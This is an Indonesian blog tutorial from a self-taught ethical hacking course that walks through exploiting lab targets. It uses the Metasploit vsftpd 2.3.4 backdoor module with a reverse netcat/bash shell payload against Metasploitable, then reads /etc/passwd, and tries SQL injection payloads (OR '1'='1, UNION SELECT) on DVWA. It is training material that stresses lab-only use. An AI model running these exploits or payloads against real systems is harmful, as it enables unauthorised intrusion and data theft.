Hari 24-25: Eksploitasi Dasar (Lab DVWA/Metasploitable) – Melancarkan Serangan Terkendali
Anda telah melalui teori, menyiapkan lab, dan mengenal alat canggih seperti Nmap dan Metasploit Framework. Kini, di Hari 24 dan 25 pelatihan otodidak ini, saatnya kita menyatukan semua pengetahuan tersebut dan melangkah ke fase paling mendebarkan: eksploitasi. Kita akan mempraktikkan hacking etis secara terkendali di lingkungan lab aman Anda (DVWA atau Metasploitable) untuk melihat bagaimana vulnerability dapat dimanfaatkan. Hingga saat ini, kemampuan untuk mengeksekusi exploit secara etis di lingkungan terkontrol adalah keterampilan inti yang membedakan ethical hacker dari sekadar teoritis.
Penting: Selalu ingat, semua latihan ini harus dilakukan di dalam virtual machine Anda dan hanya menargetkan DVWA atau Metasploitable yang sudah Anda siapkan. Jangan pernah, sekali lagi, jangan pernah mencoba teknik ini pada sistem lain di internet atau jaringan pribadi mana pun tanpa izin tertulis. Keamanan dan etika adalah yang utama.
Eksploitasi: Memanfaatkan Kerentanan
Eksploitasi adalah proses menggunakan kode (disebut exploit) yang dirancang untuk mengambil keuntungan dari vulnerability spesifik dalam sistem atau aplikasi target. Tujuan dari eksploitasi adalah untuk mendapatkan akses tidak sah, menjalankan kode berbahaya, atau menyebabkan denial of service.
Dalam konteks ethical hacking, tujuan kita adalah mensimulasikan serangan ini untuk:
Memahami bagaimana hacker jahat beroperasi.
Mengevaluasi dampak dari vulnerability yang ditemukan.
Memberikan rekomendasi untuk memperbaiki celah keamanan tersebut.
Skenario Latihan: Menggunakan Metasploit pada Metasploitable
Kita akan fokus pada penggunaan Metasploit Framework untuk mengeksploitasi Metasploitable 2/3, karena ini adalah skenario yang relatif straightforward dan sering digunakan untuk pemula.
Prasyarat:
Kali Linux VM Anda berjalan.
Metasploitable VM Anda berjalan di jaringan internal yang sama.
Anda sudah tahu alamat IP Metasploitable (misalnya,
192.168.56.102).Anda sudah familiar dengan perintah dasar Metasploit (
msfconsole,use,show options,set).
Skenario Eksploitasi Umum: FTP Backdoor pada Metasploitable
Metasploitable 2 memiliki layanan FTP (vsftpd 2.3.4) yang rentan terhadap backdoor yang disengaja. Kita bisa mengeksploitasi ini untuk mendapatkan akses shell ke Metasploitable.
Langkah-langkah di Terminal Kali Linux Anda:
Mulai Metasploit Konsol:
BashmsfconsoleCari Exploit yang Sesuai:
Kita tahu Metasploitable menggunakan vsftpd 2.3.4. Mari kita cari exploit untuk itu.
search vsftpdAnda akan melihat hasil seperti
exploit/unix/ftp/vsftpd_234_backdoor. Ini adalah yang kita cari.Pilih Exploit:
use exploit/unix/ftp/vsftpd_234_backdoorTampilkan Opsi yang Diperlukan:
show optionsAnda akan melihat daftar opsi. Yang paling penting adalah
RHOSTS(alamat IP target) danLHOST(alamat IP mesin penyerang/Kali Linux Anda).Atur Opsi:
Setel
RHOSTSke IP Metasploitable Anda.set RHOSTS 192.168.56.102 # Ganti dengan IP Metasploitable AndaSetel
LHOSTke IP Kali Linux Anda di jaringan internal yang sama. Anda bisa menemukan IP ini denganifconfigatauip adi Terminal Kali yang lain.set LHOST 192.168.56.101 # Ganti dengan IP Kali Linux AndaVerifikasi lagi opsi-opsi dengan
show options.
Pilih dan Atur Payload:
Pertama, lihat payload yang tersedia untuk exploit ini:
show payloadsAnda mungkin melihat banyak opsi. Untuk latihan awal,
cmd/unix/reverse_netcatataucmd/unix/reverse_bashadalah pilihan bagus untuk mendapatkan shell sederhana.Setel payload:
set payload cmd/unix/reverse_netcatPastikan opsi payload sudah benar dengan
show optionslagi.LHOSTdanLPORTpada payload akan otomatis terisi dari pengaturan global Anda atau exploit.
Jalankan Exploit!
exploitJika berhasil, Anda akan melihat pesan yang menunjukkan payload terkirim, dan Anda akan mendapatkan sesi shell terbuka ke Metasploitable. Anda akan melihat prompt shell baru (misalnya,
whoamiakan mengembalikanroot, yang berarti Anda mendapatkan akses root!).Eksplorasi (Post-Exploitation Sederhana):
Coba perintah Linux dasar seperti
ls,pwd,id,cat /etc/passwd.Ini adalah bukti bahwa Anda berhasil mengeksploitasi kerentanan dan mendapatkan akses ke sistem target.
Ketik
exitatauCtrl+Cuntuk keluar dari sesi shell.
Skenario Latihan: SQL Injection pada DVWA
Jika Anda memilih DVWA, mari kita coba eksploitasi SQL Injection pada tingkat kesulitan "Low".
Prasyarat:
Kali Linux VM berjalan.
DVWA diinstal dan berjalan di VM terpisah di jaringan internal yang sama.
Anda sudah login ke DVWA (username: admin, password: password) dan mengatur Security Level ke "Low".
Langkah-langkah di Browser Kali Linux Anda:
Akses DVWA: Buka browser di Kali Linux Anda dan navigasi ke alamat IP DVWA Anda (misal:
http://192.168.56.103/dvwa). Login sebagaiadmin/password.Pilih SQL Injection: Di menu samping kiri DVWA, pilih "SQL Injection".
Eksploitasi SQL Injection:
Pada kolom "User ID:", coba masukkan
1lalu klik "Submit". Anda akan melihat detail pengguna dengan ID 1.Sekarang, coba inject kode SQL berbahaya. Masukkan:
SQL1' OR '1'='1Lalu klik "Submit". Jika berhasil, Anda akan melihat semua pengguna di database karena
'1'='1'akan selalu benar.Untuk mendapatkan nama kolom database (enumeration):
SQL1' ORDER BY 10-- -(Ubah angka 10 hingga Anda mendapatkan error, lalu kurangi angka hingga tidak ada error. Ini akan menunjukkan jumlah kolom.)
Untuk mendapatkan versi database (contoh UNION-based injection):
SQL1' UNION SELECT 1,version() -- -(Note:
-- -adalah komentar di SQL, untuk mengabaikan sisa query asli.)Eksplorasi: Ada banyak skenario SQL Injection yang bisa Anda coba di DVWA. Cari tutorial online spesifik untuk DVWA SQL Injection.
Latihan untuk Hari 24-25:
Pilih salah satu skenario eksploitasi di atas: (Metasploit vsftpd backdoor ATAU DVWA SQL Injection).
Ikuti langkah-langkahnya dengan teliti di lingkungan lab Anda.
Dokumentasikan setiap perintah yang Anda jalankan dan output yang Anda dapatkan. Apa yang terjadi? Mengapa?
Ulangi percobaan beberapa kali sampai Anda merasa yakin dengan prosesnya.
Jika Anda berhasil mendapatkan shell ke Metasploitable, coba jalankan beberapa perintah dasar Linux untuk mengonfirmasi akses Anda.
Ini adalah momen "Eureka!" bagi banyak ethical hacker pemula. Merasakan sendiri bagaimana exploit bekerja adalah pengalaman belajar yang tak ternilai.
Bagaimana pengalaman pertama Anda dalam melancarkan eksploitasi terkendali ini? Apakah Anda berhasil mendapatkan akses, atau ada tantangan yang Anda hadapi?
Komentar
Posting Komentar